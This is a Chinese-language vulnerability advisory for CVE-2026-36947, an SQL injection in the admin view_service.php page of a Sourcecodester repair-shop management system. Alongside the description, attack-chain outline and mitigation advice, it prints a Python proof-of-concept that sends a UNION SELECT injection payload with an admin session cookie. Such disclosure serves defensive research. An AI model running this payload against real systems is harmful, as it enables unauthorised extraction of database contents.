IPBUF安全漏洞报告
English
CVE-2026-36947 CVSS 2.7 低危

CVE-2026-36947: 计算机维修店管理系统存在SQL注入漏洞

披露日期: 2026-04-13
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-36947
漏洞类型
SQL注入
CVSS评分
2.7 低危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
Sourcecodester Computer and Mobile Repair Shop Management System

相关标签

SQL注入SourcecodesterWeb安全CMS低危

漏洞概述

Sourcecodester Computer and Mobile Repair Shop Management System v1.0 版本被发现存在安全漏洞。该漏洞位于系统后台的 /rsms/admin/services/view_service.php 文件中,由于对用户输入的数据缺乏严格的过滤或验证,导致出现了 SQL 注入漏洞。尽管该漏洞的利用需要较高的权限(PR:H),但攻击者一旦获得管理员访问权限,即可利用此漏洞窃取数据库中的敏感信息。

技术细节

该漏洞属于典型的 SQL 注入漏洞。在 Sourcecodester Computer and Mobile Repair Shop Management System v1.0 的后端代码实现中,/rsms/admin/services/view_service.php 文件直接接收用户提供的参数(如服务ID)并将其拼接到 SQL 查询语句中执行,未使用预编译语句或有效的输入清洗机制。根据 CVSS 向量分析,攻击复杂度为低(AC:L),但需要高权限(PR:H),这意味着攻击者首先需要登录到管理员账户。利用此漏洞,攻击者可以通过构造恶意的 SQL 语句(例如 UNION SELECT 或布尔盲注),绕过前端验证,从数据库中提取敏感数据(如用户凭证、系统配置等),造成信息泄露(C:L)。

攻击链分析

STEP 1
侦察
攻击者识别目标正在使用 Sourcecodester Computer and Mobile Repair Shop Management System v1.0。
STEP 2
获取权限
由于漏洞需要高权限(PR:H),攻击者通过钓鱼、暴力破解或其他手段获取管理员账户凭证。
STEP 3
漏洞利用
攻击者使用管理员身份登录系统,访问 /rsms/admin/services/view_service.php 页面,并在参数中注入恶意 SQL 代码。
STEP 4
数据窃取
数据库执行恶意查询,将敏感数据(如用户名、密码哈希)返回给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Example) target_url = "http://example.com/rsms/admin/services/view_service.php" # Attacker's Session Cookie (Required due to PR:H) cookies = { "PHPSESSID": "valid_admin_session_id_here" } # Vulnerable parameter assumption (e.g., 'id') payload = { "id": "1' UNION SELECT 1, user(), database(), version()-- -" } try: response = requests.get(target_url, params=payload, cookies=cookies) # Check if database information is reflected in the response if "root@" in response.text or "information_schema" in response.text: print("[+] Vulnerability Confirmed: SQL Injection successful.") print("[+] Response snippet:", response.text[:200]) else: print("[-] Exploit failed or patch applied.") except Exception as e: print(f"Error: {e}")

影响范围

Sourcecodester Computer and Mobile Repair Shop Management System v1.0

防御指南

临时缓解措施
如果无法立即升级,建议限制管理后台的访问IP地址,并加强管理员账户的安全策略(如启用多因素认证)。同时,可在Web应用防火墙(WAF)中部署规则,拦截针对 view_service.php 的异常SQL请求。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表